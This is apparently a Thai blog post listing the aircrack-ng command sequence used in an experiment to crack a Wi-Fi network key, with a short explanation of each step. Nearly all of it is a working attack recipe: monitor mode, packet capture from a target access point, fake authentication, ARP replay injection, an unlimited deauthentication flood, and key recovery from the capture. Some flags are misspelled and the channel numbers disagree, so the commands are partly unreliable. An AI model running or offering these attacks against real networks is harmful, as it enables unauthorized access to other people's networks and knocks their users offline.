คำสั่งที่ใช้ในการทดลอง
-airmon-ng
(แสดง Interface ที่มีอยู่)
-airmon-ng start wlan0
(เปิด wlan0 ให้อยู่ในโหมด monitor )
-airodump-ng mon0
(แสกน access point และ client)
-airodump-ng --channell 1 -bssid XX:XX:XX:XX -w dnsandavideos mon0
(บันทึก Packet ที่ capturing ได้ จาก channel 11 และ ssid XX:XX:XX:XX ชื่อ dnsandavideos จาก mon0)
-aireplay-ng -1 0 -a XX:XX:XX:XX mon0
(Attack 1: Fake authentication)
-aireplay-ng -3 -b XX:XX:XX:XX mon0
(Attack 3: ARP request replay attack)
-aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack)
(Attack 0: Deauthentication)
-aircrack-ng dnsandavideos*.cap
(หา Key จากไฟล์ที่ capture ไว้ )
ดูวิดีโอด้านล่างประกอบได้เลยครับ
++คำอธิบายถ้าผิดยังไง ผู้รู้รบกวนบอกด้วยครับ++
เอกสารเพิ่มเติม >>>> http://www.aircrack-ng.org/
0 comments:
Post a Comment